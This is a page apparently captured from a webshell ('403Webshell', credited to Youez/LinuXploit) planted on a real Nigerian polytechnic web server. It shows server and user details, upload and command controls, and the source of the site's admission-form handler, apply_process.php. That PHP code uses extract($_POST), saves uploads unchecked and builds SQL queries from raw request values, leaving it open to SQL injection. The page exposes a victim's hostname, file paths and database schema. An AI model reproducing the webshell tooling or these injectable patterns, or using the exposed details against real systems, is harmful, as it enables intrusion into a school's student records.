403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.127.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/apply_process.php
<?php
ob_start();
session_start();
extract($_POST);
require_once('../connect.php');
$db=db_connect();
$session='2018/2019';
$level=$_SESSION['formType'];
$formNo=$_SESSION['formNo'];
$material=$_FILES['user_file1'];
$material_name=$_FILES['user_file1']['name'];
if(!$material_name){
    header('location:'.'apply.php?id=passport');
    die();
}
$material_name=$_FILES['user_file1']['name'];
$material_type=$_FILES['user_file1']['type'];
$material_tmp=$_FILES['user_file1']['tmp_name'];
$material_size=$_FILES['user_file1']['size'];
$old=$_FILES['user_file1']['tmp_name'];
$new="../passportForm/".$formNo.".jpg";


/*$material_size=$_FILES['user_file2']['size'];
if($material_size > 52598)

{
    echo $material_size;
    echo "Passport  Error! limit exceeded";
    die();
}
*/
move_uploaded_file($old,$new);


//$material_namePix1=$_FILES['olevelPix1']['name'];
//if((!$material_namePix1) and ($level=='utmeForm')){
//    header('location:'.'apply.php?id=O_Level1');
//    die();
//}
//$material_typePix1=$_FILES['olevelPix1']['type'];
//$material_tmpPix1=$_FILES['olevelPix1']['tmp_name'];
//$material_sizePix1=$_FILES['olevelPix1']['size'];
//$oldPix1=$_FILES['olevelPix1']['tmp_name'];
//$newPix1="../olevelScanned/".$formNo."_1.jpg";
//move_uploaded_file($oldPix1,$newPix1);


if ($level=='utmeForm'){
    $queryJamb="SELECT * FROM jambrelease WHERE jambNo='$jambNo'";
    $rsJamb=$db->query($queryJamb);
    $rsJamb_fetch = $rsJamb->fetch (PDO::FETCH_BOTH);
    $jambScore=$rsJamb_fetch['totalScore'];

	$levelid="UTME";
    $mode='FT';
	$ndMatNo='0';
	$ndResult=0;
    $nddept='0';
    $ndinst='0';
    $ndit='0';
    $nditaddr='0';
    $nditF='0';
    $nditT='0';
}elseif($level=='ptForm')  {
	$levelid="PT";
//	$jambNo='0';
	$jambScore=0;
	$mode='PT';
    $ndMatNo='0';
    $ndResult=0;
    $nddept='0';
    $ndinst='0';
    $ndit='0';
    $nditaddr='0';
    $nditF='0';
    $nditT='0';
}elseif ($level=='dptForm') {
    $levelid="DPT";
//    $jambNo='0';
    $jambScore=0;
    $mode='PT';
    $ndMatNo='0';
    $ndResult=0;
    $nddept='0';
    $ndinst='0';
    $ndit='0';
    $nditaddr='0';
    $nditF='0';
    $nditT='0';
}elseif ($level=='remForm') {
    $levelid="REM";
    $jambNo='0';
    $jambScore=0;
    $mode='FT';
    $ndMatNo='0';
    $ndResult=0;
    $nddept='0';
    $ndinst='0';
    $ndit='0';
    $nditaddr='0';
    $nditF='0';
    $nditT='0';
}elseif($level=='hndForm'){
	 $levelid="HND";
	 $jambScore=0;
	$mode='FT';
}elseif($level=='preForm'){
	 $levelid="PRE";
	$jambNo='0';
	$jambScore=0;
	$mode='FT';
    $ndMatNo='0';
    $ndResult=0;
    $nddept='0';
    $ndinst='0';
    $ndit='0';
    $nditaddr='0';
    $nditF='0';
    $nditT='0';
}elseif($level=='certForm') {
    $levelid = "PT";
    $jambNo = '0';
    $jambScore = 0;
    $mode = 'PT';
    $ndMatNo = '0';
    $ndResult = 0;
    $nddept = '0';
    $ndinst = '0';
    $ndit = '0';
    $nditaddr = '0';
    $nditF = '0';
    $nditT = '0';
}
//die($jambScore);
$surname=str_replace("'","''",$surname);
$otherName=str_replace("'","''",$otherName);
$address=str_replace("'","''",$address);
$gName=str_replace("'","''",$gName);
$gAddress=str_replace("'","''",$gAddress);
$nName=str_replace("'","''",$nName);
$nAddress=str_replace("'","''",$nAddress);
$ndit=str_replace("'","''",$ndit);
$nditaddr=str_replace("'","''",$nditaddr);
$sname=str_replace("'","''",$sname);


///===============================

$sql_fill=$db->query("select * from stddata where formNo='$formNo'");
 $sql_fill_count=$sql_fill->rowCount();

$sql_olevel=$db->query("select * from preolevel where formNo='$formNo'");
 $sql_olevel_count=$sql_olevel->rowCount();
if (($sql_fill_count==1) and ($sql_olevel_count==1)) {
    header('location:' . 'applyPrint.php');
    die();
}
//====================================

//echo "INSERT INTO `fedpoly`.`stddata` (`sn`, `formNo`,`originalNo`, `surname`, `otherNames`, `school`, `dept`, `option`, `level`, `mode`, `state`, `lga`, `admStatus`, `dob`, `gsm`, `jambNo`, `jambScore`, `session`, `regDate`, `maritalStatus`, `sex`, `nationality`, `homeTown`, `religion`, `address`, `email`, `ndMatNo`, `ndResult`)VALUES (NULL, '$formNo','1', '$surname', '$otherName', '$txtschools', '$dept', '$dept', '$level', '$mode', '$txtstate', '$lga', 0, '$dob', '$phoneNo', '$jambNo', '$jambScore', '$session', CURRENT_TIMESTAMP, '$mStatus', '$sex', '$nationality', '$town', '$religion', '$address', '$email', '$ndMatNo', '$ndResult')";
$numberONE="INSERT INTO `fedpoly`.`stddata` (`sn`, `formNo`,`originalNo`, `surname`, `otherNames`, `school`, `dept`, `option`, `level`, `mode`, `state`, `lga`, `admStatus`, `dob`, `gsm`, `jambNo`, `jambScore`, `session`, `regDate`, `maritalStatus`, `sex`, `nationality`, `homeTown`, `religion`, `address`, `email`, `ndMatNo`, `ndResult`)VALUES (NULL, '$formNo','1', '$surname', '$otherName', '$txtschools', '$dept', '$dept', '$level', '$mode', '$txtstate', '$lga', 0, '$dob', '$phoneNo', '$jambNo', '$jambScore', '$session', CURRENT_TIMESTAMP, '$mStatus', '$sex', '$nationality', '$town', '$religion', '$address', '$email', '$ndMatNo', '$ndResult')";
//die();
$sql=$db->query($numberONE);
$db->query("UPDATE  `fedpoly`.`stddata` SET  `school` =  '$txtschools',
`dept` =  '$dept',
`option` =  '$dept',
`level` =  '$level',
`mode` =  '$mode',
`state` =  '$txtstate',
`lga` =  '$lga',
`dob` =  '$dob',
`gsm` =  '$phoneNo',
`jambNo` =  '$jambNo',
`jambScore` =  '$jambScore',
`session` =  '$session',
`maritalStatus` =  '$mStatus',
`sex` =  '$sex',
`nationality` =  '$nationality',
`homeTown` =  '$town',
`religion` =  '$religion',
`address` =  '$address',
`email` =  '$email',
`ndMatNo` =  '$ndMatNo',
`ndResult` =  '$ndResult' WHERE  `stddata`.`formNo` =  '$formNo' LIMIT 1 ");
//echo $formNo.'tyytddyd';
//header('location:'.'apply.php?id=1b');
//ND result
$total_olevel=$_SESSION['total_olevel'];
require_once('olevel.php');
//echo $total_olevel;
if ($total_olevel==0){
  // echo $total_olevel;
    header('location:'.'apply.php?id=o_level');
    die("here");
}

if (($level=='hndForm') or ($level=='hdptForm')){
    //$ndDate=$_POST['ndDate'];
   // $total_olevel=$_SESSION['total_olevel'];
  //  INSERT INTO `fedpoly`.`stddata` (`sn`, `formNo`, `originalNo`, `surname`, `otherNames`, `school`, `dept`, `option`, `level`, `mode`, `state`, `lga`, `admStatus`, `dob`, `gsm`, `jambNo`, `jambScore`, `session`, `regDate`, `maritalStatus`, `sex`, `nationality`, `homeTown`, `religion`, `address`, `email`, `ndMatNo`, `ndResult`) VALUES (NULL, '6', '2', '3', '4', '5', '6', '7', '8', '9', '0', '0', '0', '2016-06-21', '0', '0', '0', '0', '2016-06-06 00:00:00', '0', '0', '0', '0', '0', '0', '0', '0', '0'), (NULL, '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', CURRENT_TIMESTAMP, '', '', '', '', '', '', '', '', '');



    $db->query("INSERT INTO `fedpoly`.`ndresult` (`sn`, `formNo`, `inst`, `course`, `result`, `rMatNo`, `rYear`, `itName`, `itAddress`, `itTo`, `itFrom`)
VALUES (NULL, '$formNo', '$ndinst', '$nddept', '$ndResult', '$ndMatNo', '$ndDate', '$ndit', '$nditaddr', '$nditF', '$nditT')");

    $db->query("UPDATE `fedpoly`.`ndresult` SET `inst`='$ndinst', `course`='$nddept', `result`='$ndResult', `rMatNo`='$ndMatNo', `rYear`='$ndDate', `itName`='$ndit', `itAddress`='$nditaddr', `itTo`='$nditT', `itFrom`='$nditF' WHERE `ndresult`.`formNo` = '$formNo' LIMIT 1 ");
//
}
//
$db->query("INSERT INTO `fedpoly`.`otherinfo` (`sn`, `formNo`, `gName`, `gAddress`, `gGsm`, `gRel`, `nName`, `nAddress`, `nGsm`, `nrel`)
VALUES (NULL, '$formNo', '$gName', '$gAddress', '$gGsm', '$gRel', '$nName', '$nAddress', '$nGsm', '$nRel')");
//
$db->query("UPDATE `fedpoly`.`otherinfo` SET `gName`='$gName', `gAddress`='$gAddress', `gGsm`='$gGsm', `gRel`='$gRel', `nName`='$nName', `nAddress`='$nAddress', `nGsm`='$nGsm', `nrel`='$nRel' WHERE `otherinfo`.`formNo` = '$formNo' LIMIT 1 ");
require_once('olevel.php');
//
$db->query("INSERT INTO `fedpoly`.`secondary` (`sn`, `formNo`, `sname`, `sfrom`, `sto`) VALUES (NULL, '$formNo', '$sname', '$sfrom', '$sto')");
$db->query("UPDATE `fedpoly`.`secondary` SET `sname` = '$sname',`sfrom` = '$sfrom',`sto` = '$sto' WHERE `secondary`.`formNo` = '$formNo' LIMIT 1 ;");
//
$sql_fill=$db->query("select * from stddata where formNo=$formNo");
$sql_fill_count=$sql_fill->rowCount();

$sql_olevel=$db->query("select * from preolevel where formNo=$formNo");
$sql_olevel_count=$sql_olevel->rowCount();
if (($sql_fill_count==1) and ($sql_olevel_count==1)){
    header('location:'.'applyPrint.php');
}else{
    echo $sql_fill_count;
    echo $sql_olevel_count;
//    die();
    header('location:'.'apply.php?id=mainData');
}
ob_end_flush();
?>

Youez - 2016 - github.com/yon3zu
LinuXploit